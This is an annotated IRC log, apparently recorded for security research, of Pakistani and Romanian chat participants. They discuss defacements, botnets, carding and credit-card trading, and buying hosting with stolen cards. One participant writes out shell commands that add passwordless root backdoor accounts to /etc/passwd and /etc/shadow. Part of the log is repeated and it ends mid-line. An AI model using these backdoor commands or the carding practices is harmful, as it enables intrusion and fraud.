dynamic@example.org (yUCK_ :D1ck! :) :D1ck! ::) :J4n3! :wait :D1ck! :ok :J4n3! :Course outline : :J4n3! :Introduction :J4n3! :History :J4n3! :X windows Setup :J4n3! :Dialup Networking :J4n3! :Ethernet Networking :J4n3! :TCP/IP :J4n3! :SMB :J4n3! :Sendmail Mail server :J4n3! :Apache Web Server :J4n3! :Applixware :J4n3! :DNS Server :J4n3! :NFS :J4n3! :Sound Card Configuration :D1ck! :errrrr :D1ck! :i know all that. :D1ck! :is that it? :D1ck! :heh :J4n3! :that is for first module i think :D1ck! :oh :D1ck! :*sigh* :D1ck! :*sigh* :D1ck! :www.example.com :D1ck! :hahaha :J4n3! :ok sent :) :D1ck! :www.example.com :D1ck! :all indian ns :D1ck! :lol :D1ck! :thx :J4n3! :wow :J4n3! :kool :J4n3! :yaar ye defacement ab tight hogee dude this defacement will now become tight. :D1ck! :yep :D1ck! :so sup? :D1ck! :naveeed ko example ka pata laga? has naveed figured out about example? :D1ck! :haha :J4n3! :yup :J4n3! :bataya mainay yup, i had told him :D1ck! :oye :D1ck! :where did u send :D1ck! :dynamic@example.org? :J4n3! :both :D1ck! :k dint get it yet / :D1ck! ::/ :Sp07! :.say a :Sp07! :dos help :Sp07! :. :D1ck! :=) :D1ck! :i had a bot :D1ck! :with uptime of 90 days :D1ck! :but on fine morning :D1ck! :i was sitting :D1ck! :and he/she pinged :D1ck! :and never came back ): :Sp07! :sup :Sp07! :[Sp07@raptorshells Sp07]$ uptime :Sp07! : 9:23pm up 103 days, 8:37, 1 user, load average: 1.00, 1.00, 1.00 :Sp07! :my friends shell :D1ck! :thats nothing dude :D1ck! :dude :D1ck! :i has a box at netkonnect :D1ck! :uptime ws 630 days :D1ck! :thats like 2 years :Sp07! :heh :D1ck! :heh :D1ck! :dude :D1ck! :dis :D1ck! :look for 8.1.2 overflow for me pls :D1ck! :THANKS :Sp07! :? :J4n3! :.msg |sanam| Sanammmmmmmmmm :) PRIVMSG |sanam| :Sanammmmmmmmmm :) :J4n3! :.join #d4v3 :J4n3 :J4n3 :|sanam| :J4n3 :J4n3 :|sanam| are these all :|sanam| your bots? :J4n3 yes all these are mine :) :J4n3 these are too few :J4n3 all the other poor bots are down :J4n3 :J4n3 awww... has it gone this far? :|sanam| who? :|sanam| who? :J4n3 you and who? :|sanam| :|sanam| :J4n3 sir.... :J4n3 express your desire :|sanam| you keep one for pinging :J4n3 ok as you wish master :J4n3 you shall receive one for pinging by tomorrow :|sanam| -=- Day 12 June 15 :|S4n4m| :tum aisey hi bolna Just keep on saying like this :|S4n4m| :karna kuch nahi dont do anything :J4n3 :ye baath hai ? is that the deal? :|S4n4m| :han yes :|S4n4m| :yeh bat hay that is the deal :J4n3 :ping bot aaraha hai the ping bot is coming :|S4n4m| :instooooooooooooooooooooo :|S4n4m| ::) :|S4n4m| :karachi mey aooo come to karachi :J4n3 :ok bot aagaya ok the bot is here :J4n3 :d3s|r3 hai uska nick it's nick is d3s|r3 :J4n3 :ab main channel par tyep karo ping me now type in the main channel in ping (Note:: dont know what it translates to) :J4n3 : PiNG THiNGiE - hiall's ping reply took 13 seconds :|S4n4m| :hmmm :|S4n4m| :tahnks :J4n3 :dekha ? saw that? :J4n3 :ab khush ? now are you happy? :|S4n4m| :han yes :|S4n4m| :kush happy :J4n3 :bus thum khush raho :) that's all ... keep staying happy :) :|S4n4m| :wah cool :|S4n4m| :kya bat hay app ki what shall i say about you :|S4n4m| :wasey :|S4n4m| :mey ney ek bandha rakh leeya hay i have kept one system for myself :|S4n4m| :ping key leyya for pinging :J4n3 :thumara bandaa 24 hour nahin betay gas your system wont be for 24 hours (Note:: again i am having difficulty translating - grammar issues in urdu :J4n3 :mera bot hoga my bot will :|S4n4m| :hmmmmmmmmmm :|S4n4m| :instoo :|S4n4m| :zara 5 min key leyee for a little bit... 5 mins :|S4n4m| :karachi channel per on karachi channel :|S4n4m| :flori ka interview ley loo take flori's interview :|S4n4m| :mey ney appoint kya hay i have appointed (him/her?) :J4n3 :hahaha nahin thum khud hee laylo yes yes, but take it yourself (the interview) :|S4n4m| :kyon why? :|S4n4m| :tum yahn key op hoo you are the op here :|S4n4m| :admintration mey hoo i am in administration :J4n3 :op thum oh main co-founder hon you are the op, i am the co-founder :J4n3 :aaayee meraa dil......chua kay lagyeeee...churanay wali meri qaatil ohhh.... she stole my heart :|S4n4m| :han wohi hii yes, her :|S4n4m| :hello :|S4n4m| :kya hoa what happened? :J4n3 :wait :J4n3 :.up :J4n3 :.op netra :J4n3 :.op Ott0 :Dew :Hey J4n3 u there ? :J4n3 :.host add J4n3 * :J4n3 :.up :J4n3 :OngHome esay $uptime :D1ck :J4n3 :D1ck :i`m getting my own server;) :D1ck :J4n3 :D1ck :J4n3 :J4n3 :D1ck :J4n3 :i'm here :D1ck :hehe :D1ck :J4n3 :J4n3 :hehe :J4n3 :D1ck :D1ck :oye give me those commands for linux password adding and sun adding re ro re r i gave u :D1ck ::P :D1ck :i lost mine :J4n3 :wait :D1ck :and i dont wana make again :J4n3 :cp /etc/passwd /etc/.tp; :J4n3 :echo "ro::99999::::::" >> /etc/shadow; :J4n3 :echo "r::99999::::::" >> /etc/shadow; :J4n3 :echo "ro:x:500:1000::/:/bin/bash" >> /etc/passwd; :J4n3 :echo "r:x:0:0::/:/bin/bash" >> /etc/passwd; :J4n3 :cp /etc/shadow /etc/.ts; :D1ck :k :J4n3 ::p :D1ck :and suhn :D1ck :? :D1ck :sun :D1ck :? :J4n3 :wait :D1ck :gimme sun tew :D1ck :k :J4n3 :cp /etc/passwd /etc/.tp; :J4n3 :echo "re::6445::::::" >> /etc/shadow; :J4n3 :echo "r::10891::::::" >> /etc/shadow; :J4n3 :echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd; :J4n3 :echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd; :J4n3 :cp /etc/shadow /etc/.ts; :D1ck :thx :J4n3 :np :p :D1ck :oye :D1ck :me getting a box :D1ck :T+3 :D1ck :T3 :J4n3 :wow :J4n3 :kewl :D1ck :where should i get? :D1ck :where is j0e getting :D1ck :d4v3 i want the folling domains :J4n3 :folling ? (Note:: misspelt "following") :D1ck example.org :J4n3 :j0e say contact nahi huwa called him 2 times j0e said there has been no contact ... called him 2 times :D1ck :wetcunts.net :J4n3 :example hmm :J4n3 :mil jayega agar register nahi huwa hai tho we will get it if it has not been registered :D1ck :undefined.net :D1ck :and kewl ones :D1ck :but not one's that end with zzz :D1ck :like dreamzzz.net :D1ck :etc :D1ck :eeet.org :D1ck :eeet.net :D1ck :oye :D1ck :how much j0e paid :D1ck :and what server? :J4n3 :he paid 250 $ :J4n3 :from example.net :D1ck :kewl :D1ck :for a T3? :J4n3 :and yeah example.org and com net all available :p :J4n3 :T1 i think :D1ck :kewl :D1ck :get me please :D1ck :oh :J4n3 :yaar CC :( :J4n3 :no CC right now :J4n3 :yaar u have that bind weapon why dont u hit a big shoping site and take cc's ? (Note:: here's where they hatch the idea of stealing CCs) :D1ck :yep :D1ck :oki :D1ck : welp why dont we all hang in :D1ck :it was my channel and i think ti still is :J4n3 :abay yaar sub fraud hotha hai wahan par hey dude, a lot of fraud goes on there :J4n3 :their CC's do not work :D1ck :hehe :J4n3 :bauth try kiya hai undernet and effnet par tried a lot on undernet and effnet :D1ck :k :D1ck :heh k :D1ck : DIGITALINET offers quality web hosting staring at 6$ a :D1ck : month. Signup for webhosting with digitalinet and get your :D1ck : domain for 11$ a year :D1ck : information. :D1ck :i`ll buy 2 legit domains there :J4n3 :haha i had a shell from there :D1ck :kewl :J4n3 :they closed shell service now :J4n3 :adult web hosting :p :D1ck :lol :J4n3 :service achee thee buree nahin thee the service was good, not bad at all :D1ck :haha :J4n3 :oye sex time :J4n3 :brb :J4n3 :br :J4n3 :bbl :J4n3 :shayed so gaya seems like he's gone to sleep :D1ck :ahahahha :J4n3 :hehe :J4n3 :g0ne :D1ck :.join :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? :L4stly :Does anyone here have any working Credit Card numbers with full details ? :^w1nX^ :cc :^w1nX^ :cc :^w1nX^ :sleepin chann :^w1nX^ :trade :^w1nX^ :sleepin chann :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :trade :atlanta.ga.us.undernet.org 005 spitz SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :nirvana19 :e cinevA de aici si pe rocarding? (Note:: definitely not urdu here :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :^w1nX^ :ping me :Bl4ck_ :not again :Bl4ck_ :-up :nirvana19 :I buy stuff :SLaZz :who wants to trade cc's ?? :nirvana19 :gfnbfg :nirvana19 :someone from romania? :savantul :yes :_Mephisto :multi :_Mephisto ::) :nirvana19 :aveti ceva marfa? (Note:: ??) :nirvana19 :cumpar :_CardMan_ :re ppl :Bl4ck_ :arrrrrrrrrrrrrrrrr :Bl4ck_ :-up :_CardMan_ :what is new ? :Bl4ck_ :shitttttttttttttt :_CardMan_ :stupid bots :Bl4ck_ :-up :Bl4ck_ :-up :_CardMan_ :this is fun.... :Bl4ck_ :Omblad0n up :Bl4ck_ :Omblad0n op :Bl4ck_ ::>> :Bl4ck_ :arrrrrr :_CardMan_ :Bl4ck_....do u know what u r doing ? :Bl4ck_ :dunoo :_CardMan_ :i saw.... :_CardMan_ :so ... any romanian people here ? :bug____ :ops :_CardMan_ :bug____...whats up ? :savantul :lots :bug____ :nimic man :_CardMan_ :ok... :bug____ :I need cc :bug____ :lol :_Mephisto :me too :_CardMan_ :pai care e din bucale si are niste cc-uri bune (NU bunicele, sau extrapolate) sa initieze o privata repede.... (Note:: ??) :nirvana19 :da o gramada de romanian pepole pe aici (Note:: ??) :bug____ :1 cc :bug____ :1 :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede.... :_CardMan_ :care esti pe kappa (IP: 192.168.254.95 :_CardMan_ :DNS: dialup-56k-95.example.xx :_CardMan_ :si dai cu scanarea ? :nirvana19 :de unde pot sa fac rost de Legion 2.1 :_Mephisto :de la mine :_CardMan_ :nirvana19.... LOLZ... nu stiai ca are back door mah ? :nirvana19 :poti sa mi-l dai? :dlotos33 :Is there any Romania friends? :bug____ :nope :dlotos33 :Is there any Romania friends? :_CardMan_ :a lots :Co0lWoRx :any1 here wanna earn +v, msg me :Co0lWoRx :any1 here wanna earn +v, msg me :v|Adu :re :v|Adu ::) :Co0lWoRx :ACTION any1 here wanna earn +v, msg me :v|Adu :anybody need a drop place ? :nirvana19 :de unde esti ma vladule? :_CardMan_ :v|Adu.... lasa-te de meserie .... :v|Adu ::))))))) :v|Adu :cardman :v|Adu ::) :v|Adu :hahahahah :v|Adu ::) :_CardMan_ :suck it (Note:: ?? - all this is either romanian or some other language) :Co0lWoRx :ACTION any1 here wanna earn +v, msg me :nirvana19 :sorry :Co0lWoRx :ok :Co0lWoRx :np :xroach :anybody have any driver license template ? :xroach :anybody have any driver license templates ? :bug____ :u can save my ass with 1 cc :xroach :actually any good templates would be nice :bug____ :I got some sites :v|Adu :re :Co0lWoRks :ACTION any1 wanna earn +v in :Co0lWoRks :ACTION any1 wanna earn a virgin card, msg me now :Co0lWoRks :ill bbl, since no one wants anything here :Bl4ck_ :-up :Bl4ck_ :? :Bl4ck_ :soory :Bl4ck_ :I`ll go :dlotos33 :anyone have CC? :s1z1f :yes :xroach :anyone have or know where i could get license templates or any templates for mag cards ? :s1z1f :do enyone have cc? :dlotos33 :Does any one speak germany? :_CardMan_ :do not think so ... :2red :i speak some german :2red :why? :dlotos33 :What means "ORT" at GERMANY? :2red :city? :dlotos33 :thank you ,my friend :MaTiX_00 :hello :MaTiX_00 :anyone got a proxy for me to use? :dlotos33 :yes :SpRiTe^^^ :HI :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede.... :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ : xxxx xxxx xxxx xxxx :SpRiTe^^^ :4,4 xxxx xxxx xxxx xxxx :SpRiTe^^^ :0,4 xxxx xxxx xxxx xxxx :SpRiTe^^^ :4,4 xxxx xxxx xxxx xxxx :SpRiTe^^^ :0,0 1,1 xxxx xxxx xxxx xxxx :kurky :Any GOOOOOOOD carders here? msg me :kurky :Anyone here got a UK cc??? Msg me :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA :][VaMpIrE :hi :][VaMpIrE :wanna trade? :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede.... :_CardMan_ :m4r1n4ru...salve mah :m4r1n4ru :-op :xroach :anybody have any dl templates ? cia/fbi/nsa would be cool too :s1z1f :do enybody have cc? :kurky :Anyone here got a UK cc??? Msg me for trade for Virgin VISA :s1z1f :do enybody have cc? :[SK]Kane :care aveti un proxy bun de www? :_CardMan_ :pai care e din bucale si are niste cc-uri bune, nu vrajeli sa initieze o privata repede.... :SpRiTe^^^ :H :SpRiTe^^^ :ok :m4r1n4ru :-op :s1z1f :do enybody have cc? :s1z1f :do enybody have cc? :dariuss :am yo 1000 :s1z1f :do enybody have cc? :natedogg :i do.. :s1z1f :pls give it to me :natedogg :trade... :natedogg :mgs me.. :s1z1f :pls give it to me :s1z1f :do enybody have cc? :natedogg :sizif ---------------banned#no more trade kind..... :s1z1f :do enybody have cc? :s1z1f :pls give it to me :s1z1f :do enybody have cc? :pimpg :yeah :pimpg :if you would like one you have to send me one first :pimpg :then if it approves :s1z1f :ok :pimpg :i will send one to you :pimpg :sound good :pimpg :pm me if you would like me 2 :D1ck :Tota1KaaS join #delusion :D1ck :Tota1KaaS say #delusion Ok, NOW introducing the the First Shell hosting company in pakitan, with excellent domains, Vhosts ip, bots, on a T3 HUB, coming soon. :D1ck :Tota1KaaS say #delusion If interested say on main, and one of the admins will message :) :D1ck :Tota1KaaS say #delusion Ok, NOW introducing the the First Shell hosting company in pakitan, with excellent domains, Vhosts ip, bots, on a T3 HUB, coming soon. :D1ck :Tota1KaaS say #delusion If interested say on main, and one of the admins will message :) :dariuss :Bl4ck_-)) :Bl4ck_ :se man :s1z1f :*** pimpg (~ricky@exo01-ca.example.net) has joined :s1z1f :*** Retrieving :s1z1f : do enybody have cc? :s1z1f : pls give it to me :s1z1f :*** Retrieving :s1z1f :*** natedogg has quit IRC (Signed off) :s1z1f : do enybody have cc? :s1z1f : yeah :s1z1f : if you would like one you have to send me one first :s1z1f : then if it approves :Ghici :re ppl :pimpg :hello :pimpg :would anyone like to trade, i dont go first :D1ck :D4v3 :D1ck :WHEN BACK MSG ME :s1z1f :do enybody have cc? :dariuss :ACTION c ya :m4r1n4ru :Away :m4r1n4ru :I have Returned. :m4r1n4ru :Away :s1z1f :do enybody have cc? :m4r1n4ru :Away :Bon_Jovi :m4r1n4ru :s1z1f :do enybody have cc? :Bon_Jovi :yep :m4r1n4ru :Away :m4r1n4ru :Away :s1z1f :do enybody have cc? :m4r1n4ru :Away :D1ck :hey J4n3 :J4n3 :what's new :p ? :D1ck :server :D1ck :buying :D1ck :but what did j0e say :D1ck :which is good one? :J4n3 :buying ? confirmed ? :D1ck :i got 10 domains (Note:: at this point i guess they have closed the deal with the previous CCs) :D1ck ::P :D1ck :freind bought them :D1ck :hreh :D1ck :yup :J4n3 :usay khud sahi nahi patha usnay sirf example try kiya hai aur wo sahi nahi laga usay he himself doesnt know really, he just tried example and it didnt look all right to him :D1ck :example.net sux? :D1ck :oh :J4n3 :great :D1ck :(@J4n3): great :D1ck :? :J4n3 :haha u said friend already bought it ? :D1ck :domains :D1ck ::) :J4n3 :oh :J4n3 :but from where u planning to buy ? :D1ck :kuch samhaj nahi aa rahi cant understand anything :D1ck :where should i buy :D1ck :Server Space: Single Server :D1ck :IP Numbers: 30 :D1ck :Bandwidth: 50 Gigs :D1ck :Services: Level 1 (Included) :D1ck :Monitor: 24/7 Network Monitoring (Included) :D1ck :-------------------------------------------------------------------------------- :D1ck :Payment Plan: $2,182.80 paid Annually :D1ck :Setup Fee: $100.00 :D1ck :-------------------------------------------------------------------------------- :D1ck :Total Startup: $2,282.80 :D1ck :SkyNetWEB Ltd. :D1ck :3500 Boston St. :D1ck :Baltimore Maryland, 21224 :D1ck :Phone: 410.563.6384 :D1ck :Fax: 410.563.5457 :D1ck :Server Space: Single Server :D1ck :IP Numbers: 30 :D1ck :Bandwidth: 50 Gigs :J4n3 :2,828 ? :D1ck :Services: Level 1 (Included) :D1ck :Monitor: 24/7 Network Monitoring (Included) :D1ck :-------------------------------------------------------------------------------- :D1ck :Payment Plan: $2,182.80 paid Annually :D1ck :Setup Fee: $100.00 :D1ck :-------------------------------------------------------------------------------- :D1ck :Total Startup: $2,282.80 :D1ck :SkyNetWEB Ltd. :D1ck :3500 Boston St. :D1ck :Baltimore Maryland, 21224 :D1ck :Phone: 410.563.6384 :D1ck :Fax: 410.563.5457 :D1ck :yeah :D1ck :per year :D1ck ::(? :D1ck :or :? :J4n3 :but he got it about 800 $ total i think with all system p2 400 64 mb ram and 8.4 gb hd :D1ck ::)? :m4r1n4ru :Away :D1ck :but :D1ck :that was one month :D1ck :remmeber? :J4n3 :hmm :J4n3 :u mean thats all for one year ? :J4n3 :and u gonna pay for it ? :D1ck :tell me :D1ck :what should i do? :D1ck :i`m confewsed (Note:: you man "confused"... kiddie) :J4n3 :yaar aaj raath tak wait karlo dude, wait till tonight :J4n3 :let me ask some more ppl :D1ck :oki :J4n3 :teeek haina ? it's ok with you, right? :J4n3 :i'll ask miller too :D1ck :oki :D1ck :ok :D1ck :my budget is 170-200/month :J4n3 :hmm k :D1ck :>Domain Name 1....: example.com :D1ck :>Domain Name 2....: example.com :D1ck :>Domain Name 3....: example.com :D1ck :>Domain Name 4....: example.com :D1ck :>Domain Name 5....: example.com :D1ck :>Domain Name 6....: example.com :D1ck :>Domain Name 7....: example.com :D1ck :>Domain Name 8....: example.com :D1ck :>Domain Name 9....: example.com :D1ck :>Domain Name 10...: example.com :D1ck :>Total............: $649.50 :J4n3 :oh already registered ? :D1ck :yup :J4n3 :how many years ? :D1ck :1 :J4n3 :thats expensive :J4n3 :wait :D1ck :who cares :D1ck :its cared :J4n3 :let me check :J4n3 :oh :J4n3 :then its ok but wait :D1ck :oki :D1ck :(Sephirot): I need help , SOme one can help me :J4n3 :heh :D1ck :=p :J4n3 :oye :D1ck :? :J4n3 :u could got those 10 domain for 2 years at 300 $ and for 5 years at 750 $ :D1ck :kewl :D1ck :from where? :J4n3 :dotster :D1ck :dotster.com :D1ck :? :J4n3 :1 year: $15 2 year: $30 :J4n3 :5 year: $75 10 year: $150 :J4n3 ::) :J4n3 :yeah :D1ck :cool :D1ck ::P :J4n3 :we'll get more from there :D1ck :oki :D1ck :;) :D1ck :yaar dude :D1ck :i want the server :D1ck :b4d :D1ck :kuch samhaj nahin aa rahi cant understand anything :J4n3 :haha jald baazi math karo haha, dont make haste :D1ck :oye who could make a kewl kewl kewl webpage for webhosting and shell accounts? :m4r1n4ru :Away :J4n3 :coz u going to pay from ur pocket :D1ck :lol oki :J4n3 :zara ache thara maaloom karnay do let's locate some good chap :D1ck :ok;) :J4n3 :page design karnay ka masla nahi wo hojayega dont worry dont worry about the page design problem, it shall be done :D1ck :oki kewl :D1ck ::) :D1ck :oye :J4n3 :i'm gonna open a cosmetics shop at tariq road :p :D1ck :1pani nay apna server liya tha or rent? has j0e bought the server or rented it? (Note:: aek in hindi/urdu - pronounce: ache... means one. so 1pani would be j0e that they always refer to) :J4n3 :yea ? :J4n3 :liya tha had bought it :D1ck :kewl hehe :D1ck ::/ :D1ck ::/ :J4n3 :agar thum kaho tho j0e kee baath karwatha hon thum say if you say so, i can tell you j0e's deal :D1ck :oh :J4n3 :usay kahonga thumain call karday i will ask him to call you :J4n3 :ok ? :D1ck :ok :D1ck :sure :D1ck ::) :D1ck :but after 9 :D1ck :but after 9 pm :J4n3 :teeek hai phir khud hee pooch lena sub kuch ok then just ask him everything yourself :D1ck :coz i`ll be sleeping :J4n3 :hmm ok :D1ck :k;/ :D1ck :;/ :J4n3 ::) :J4n3 :tariq road , cosmetic shop, kewl kewl bachiyan *wink* bachiyan = chicks :D1ck :lol :D1ck :hahahaha :J4n3 :hehe yeah :J4n3 :have u seen that new building dolmen mall ? :D1ck ::P :D1ck :nop :m4r1n4ru :Away :J4n3 :hmm phir dekhna , its kewl and most beautiful market in karachi hmmm then take a look at it, it's cool and most beautiful market in karachi :J4n3 :yaar give me a kewl host , aisa jis main psybnc chalaon aur crash na ho, meray ziyad thar roots main make command work nahi kartha :( dude, give me a cool host, such that if we run psybnc on it, it doesnt crash. (Note:: i am having problems with some urdu words, but the word-by-word translation for the rest of it is: meray = mine main = in nahi = doesnt kartha = happens the last part is.."make command doesnt work in this") :D1ck ::)) :D1ck :oh :D1ck :i will send u psybnc-compiled :D1ck :when i boot :D1ck ::) :J4n3 :oh then its kewl :) :J4n3 :tight :J4n3 :for sparc na ? :D1ck :yeps :J4n3 :great waiting ... :D1ck :abey abhi ruk heheheh hey wait for now heheheh :D1ck :i am tlking to the person for col :D1ck ::P :D1ck ::pPpp :J4n3 :haha ruka huwa hon jub boot karo tho daydena hehe haha, i am waiting. when you boot then give it up hehe :D1ck :*** Joins: tOpDaWgGy (KoRn@spc-isp-tor-58-18-419.example.xx) :D1ck :(tOpDaWgGy): dAwGgGYY :D1ck :(tOpDaWgGy): chinii :D1ck :(tOpDaWgGy): jApAniIii :D1ck :(@D1ck): hEYyYYyYy :D1ck :(@D1ck): dOgYY :D1ck :hehehe :J4n3 :hehehe :D1ck ::) :m4r1n4ru :Away :D1ck :oye :D1ck :read :D1ck :http://www.example.net/Contracts/CIT-Colocation%20Agreement.html :D1ck :tell me i it have some clawa :D1ck :tell me i it have some claws :J4n3 :wait :D1ck :k :J4n3 :errror araha hai there's an error :D1ck :works for me :J4n3 :hmm nope not working let me try on netscape :D1ck :k :D1ck :(tOpDaWgGy): shAe.. dAwG bhai :J4n3 :Plan A: 20 gigs/month [64kbps avg.], * up to 30 IP addresses ($150.00 :J4n3 : per month) :D1ck :is ko doggy kay ilawa this one as an alternative to doggy :J4n3 :thats what u want to buy ? :D1ck :nope :D1ck :40 gig :D1ck :256 ips :J4n3 :Plan B: 40 gigs/month [128kbps avg], * up to 62 IP addresses ($250.00 :J4n3 : per month) :J4n3 :its 62 in 40 gigs :D1ck :yep but he sed he will allow 256 if not needed :D1ck :needded :J4n3 :oh then its okay package is kool :D1ck :kewl :J4n3 :.msg G_u_Y__ abay oye chichoray mmoooon band kar apna hey you squirt, shut your mouth PRIVMSG G_u_Y__ :abay oye chichoray mmoooon band kar apna hey you squirt, shut your mouth :D1ck :best firwalling and dos protection in town :D1ck :lol :J4n3 :hmm kewl :J4n3 :oye add my this host to bots plz :) :m4r1n4ru :Away :D1ck :sure :D1ck :whats yure ip :D1ck :/whois J4n3 :J4n3 :* :D1ck :onghome.com :D1ck :oki :D1ck :.host add J4n3 * :D1ck :brb :J4n3 :thanx :) :m4r1n4ru :Away :J4n3 :.join #karachi :m0sTwAnTdpinG :G_u_Y__ you and i will get along well :J4n3 :.msg #karachi GUY ullooo kay pattay moon band rakko apna you stupid chaps, keep your mouth shut :sawera hey ask those who are about to die what their last wish is :G_u_Y__ :J4n3 :oops :J4n3 : ? :J4n3 :say A? :G_u_Y__ dearest :J4n3 :.say #karachi GUY Ullooo kay pattay mooon band rakko apna :p you stupid chaps, keep your mouth shut :J4n3 :.part #karachi :m4r1n4ru :Away :D1ck :J4n3 :D1ck :my dadi's bro died today, so my dad is off to lahore :D1ck :shit :D1ck :ab this kaam will latkofy now this work will be left hanging :J4n3 :oh :J4n3 :Inna lillaaye wa inna ilayae raajioon (Note:: some prayer to allah it seems) :J4n3 :very sorry :D1ck ::p :D1ck :yep he was 85, this is life, ppl come and go :D1ck :hehe :D1ck :its ok :D1ck :;) :J4n3 :oh :D1ck ::) :J4n3 :phir tho time tha jaanay ka unkay then it was time for him to go :J4n3 :i thought he was young :J4n3 ::p :D1ck :nop :D1ck :hehe :J4n3 :hehe :D1ck ::) :D1ck :oye :D1ck :what i say is :D1ck :hm :J4n3 :is ? :D1ck :chalo time mil gaye ga come we shall get the time :D1ck :now we can investiagte :J4n3 :yeah yeah :J4n3 ::) :D1ck :(g|nger`): well :D1ck :(g|nger`): i have like 20 :D1ck :(g|nger`): example.org example.org example.com example.net example.com example.com example.org will-fuck-up-example.com example.com example.com example.com example.com example.com :D1ck :(g|nger`): plus others :D1ck :(g|nger`): you can have whatever vhosts you want :D1ck :kewl? :m4r1n4ru :Away :J4n3 :yeah kewl :D1ck :PHAT6 :D1ck :;pp :J4n3 :if we have domains, we can have vhost of whatever we like :D1ck :yaar is it possibl that u can help me with wrebpage :P? :D1ck :i cant do alone, coz i have 0-webpage skilzl :D1ck :hehe :J4n3 :yeah yeah i'm with u always :J4n3 ::) :D1ck :iknowheh :J4n3 :dont feel ur self alone :D1ck :kool:) :D1ck :kleet :J4n3 ::) :D1ck :aur sunao so what else is new? :D1ck :what haWt :J4n3 :nutthin hot naveed nay chars maanga hai hehe nothing's hot. naveed has asked for some marijuana (chars = marijuana/pot) :D1ck :HAHAHAHAAHAHA :J4n3 :hehehe yeah :D1ck :woh charas peeta hai? apni girlfreind ka chakroon may juis nay is ko ghaas nahindali? does he do marijuana? (Note:: something about his girlfriend being involved in marijuana too) :D1ck :ROFL :J4n3 :lol :D1ck ::) :D1ck ::) :J4n3 :hah chars tho shroo say peetha hai pehlay bee main day chuka hon usko hah. he was having marijuana since the beginning. earlier i had given him some too :D1ck :lol :D1ck :oki :D1ck :tum charas latay hoon? do you also do marijuana? :[Agent] :anyone wants to have proxy list, cc list, RH bash shell eggable..msg me if ur serious :J4n3 :haan , i have many relations with drug mafia hehe :D1ck :(if answer=yes) { d4v3== "should not take" else printf ("its ok\n"); :D1ck :lol :Flapjack- :Anyone trade cc for bnc? Msg me :D1ck :char drugs[80]' :D1ck :char drugs[80]; :J4n3 :hehe :J4n3 :lol :D1ck ::) :J4n3 :main bee peetha hon kabee kabee mood hoay par i have some depends on the mood :D1ck :oh :D1ck :(@|S4n4m|): wasalamz salutations :D1ck :(sawera): w/salam :D1ck :chix? :D1ck :bawt? :J4n3 :yup |S4n4m| = mine :D1ck :hahaa :D1ck :all-chicks = yure :dmonchild :ACTION i am selling hardware if your intrested please /msg me for prices thanks :J4n3 :<|S4n4m|> key tum ko kuch kam karna hay hey do you want to do some work? :J4n3 :> thum falsafi kub say ban gayee ? since when did you become a philosopher? :J4n3 :<|S4n4m|> jab sey tum sey bat ki hay since the time i've started talking to you :J4n3 :aaaaahhhhhhhhhh :D1ck :hhaha :D1ck ::P :D1ck :mv logs.txt bhabi.txt (Note:: bhabi = sister-in-law) :J4n3 :lol :J4n3 :oye :D1ck : cat bhabi.txt :D1ck : I WILL KILL U D4v3 :D1ck :? :J4n3 :muhahahahahhahahahahhhaa :J4n3 :HHAHAHAHAHAHAH :D1ck ::) :J4n3 :heheheheh :J4n3 :ROFLMAO :D1ck :(: :J4n3 :ROFLMAO :D1ck :=P :m4r1n4ru :Away :dmonchild :ACTION i am selling hardware if your intrested please /msg me for prices thanks :m4r1n4ru :Away :Dariox :who trade cc :m4r1n4ru :Away :m4r1n4ru :Away :m4r1n4ru :Away :m4r1n4ru :Away :m4r1n4ru :Away :[Agent] :anyone can card me a laptop? :m4r1n4ru :Away :m4r1n4ru :Away :telnet- :anyone can card me a shell or web domain....pls answer to me :m4r1n4ru :Away :[Agent] :wanna trade Romanian: :|S4n4m| :tum aisey hi bolna Just keep on saying like this :|S4n4m| :karna kuch nahi dont do anything :J4n3 :ye baath hai ? is that the deal? :|S4n4m| :han yes :|S4n4m| :yeh bat hay that is the deal :J4n3 :ping bot aaraha hai the ping bot is coming :|S4n4m| :instooooooooooooooooooooo :|S4n4m| ::) :|S4n4m| :karachi mey aooo come to karachi :J4n3 :ok bot aagaya ok the bot is here :J4n3 :d3s|r3 hai uska nick it's nick is d3s|r3 :J4n3 :ab main channel par tyep karo ping me now type in the main channel in ping (Note:: dont know what it translates to) :J4n3 : PiNG THiNGiE - hiall's ping reply took 13 seconds :|S4n4m| :hmmm :|S4n4m| :tahnks :J4n3 :dekha ? saw that? :J4n3 :ab khush ? now are you happy? :|S4n4m| :han yes :|S4n4m| :kush happy :J4n3 :bus thum khush raho :) that's all ... keep staying happy :) :|S4n4m| :wah cool :|S4n4m| :kya bat hay app ki what shall i say about you :|S4n4m| :wasey :|S4n4m| :mey ney ek bandha rakh leeya hay i have kept one system for myself :|S4n4m| :ping key leyya for pinging :J4n3 :thumara bandaa 24 hour nahin betay gas your system wont be for 24 hours (Note:: again i am having difficulty translating - grammar issues in urdu :J4n3 :mera bot hoga my bot will :|S4n4m| :hmmmmmmmmmm :|S4n4m| :instoo :|S4n4m| :zara 5 min key leyee for a little bit... 5 